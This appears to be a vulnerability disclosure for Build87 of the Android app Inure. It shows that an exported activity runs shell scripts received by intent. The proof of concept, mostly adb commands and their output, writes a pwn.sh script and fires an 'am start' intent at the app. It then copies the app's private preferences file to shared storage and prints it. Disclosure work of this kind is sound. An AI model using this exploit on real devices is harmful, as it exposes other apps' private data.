Tested on Build87 of the Inure application. It was discovered that the application had an exported activity (app.simple.inure.activities.association.BashAssociation
) which accepted intent data via the file
scheme + text/x-shellscript
mime type and executed the commands contained within those opened files via RunScript.java
.
\
Since this activity is exported, it is possible for an installed malicious application to send an intent to this activity in order to execute malicious commands. In this particular case, it was possible to retrieve files from the vulnerable application’s internal directory (/data/data/app.simple.inure/
) and exfiltrate it into /sdcard
where the attacker could read the retrieved information.
PS C:\Users\Acer> adb shell
angelica:/ $ cd /sdcard
angelica:/sdcard $ mkdir inure-proof-of-concept
angelica:/sdcard $ cd inure-proof-of-concept/
angelica:/sdcard $ echo "cp /data/data/app.simple.inure/shared_prefs/Preferences.xml /sdcard/inure-proof-of-concept/inure-exfiltrated.xml" > pwn.sh
angelica:/sdcard/inure-proof-of-concept $ ls -la
total 10
drwxrwx--x 2 root sdcard_rw 3488 2023-08-13 13:32 .
drwxrwx--x 51 root sdcard_rw 3488 2023-08-13 13:31 ..
-rw-rw---- 1 root sdcard_rw 113 2023-08-13 13:32 pwn.sh
PS C:\Users\Acer\Desktop\pwn-toolkit\apks\app.simple.inure> adb shell am start -a android.intent.action.VIEW -d "file:///sdcard/inure-proof-of-concept/pwn.sh" -n app.simple.inure/.activities.association.BashAssociation
Starting: Intent { act=android.intent.action.VIEW dat=file:///sdcard/inure-proof-of-concept/pwn.sh cmp=app.simple.inure/.activities.association.BashAssociation }
angelica:/sdcard/inure-proof-of-concept $ ls -la
total 14
drwxrwx--x 2 root sdcard_rw 3488 2023-08-13 13:34 .
drwxrwx--x 51 root sdcard_rw 3488 2023-08-13 13:31 ..
-rw-rw---- 1 root sdcard_rw 1119 2023-08-13 13:34 inure-exfiltrated.xml
-rw-rw---- 1 root sdcard_rw 113 2023-08-13 13:32 pwn.sh
angelica:/sdcard/inure-proof-of-concept $ cat inure-exfiltrated.xml
<?xml version='1.0' encoding='utf-8' standalone='yes' ?>
<map>
<boolean name="apk_external_storage" value="false" />
<boolean name="is_external_storage" value="false" />
<int name="app_accent_color" value="-29592" />
<int name="main_app_launch_count" value="5" />
<boolean name="is_custom_color" value="false" />
<int name="view_positions" value="7" />
<boolean name="disclaimer_agreed" value="true" />
<string name="last_search_keyword"></string>
<string name="crashCause">android.system.ErrnoException: open failed: ENOENT (No such file or directory)</string>
<string name="home_path">/data/user/0/app.simple.inure/app_HOME</string>
<string name="crash_message">java.lang.RuntimeException: Unable to start activity ComponentInfo{app.simple.inure/app
.simple.inure.activities.association.BashAssociation}: java.io.FileNotFoundException: /sdcard/inure-proof-of-concept/inu
re-root-id-test.sh: open failed: ENOENT (No such file or directory)</string>
<long name="crash_timestamp" value="1691896905717" />
<boolean name="deep_search_keyword_mode" value="false" />
</map>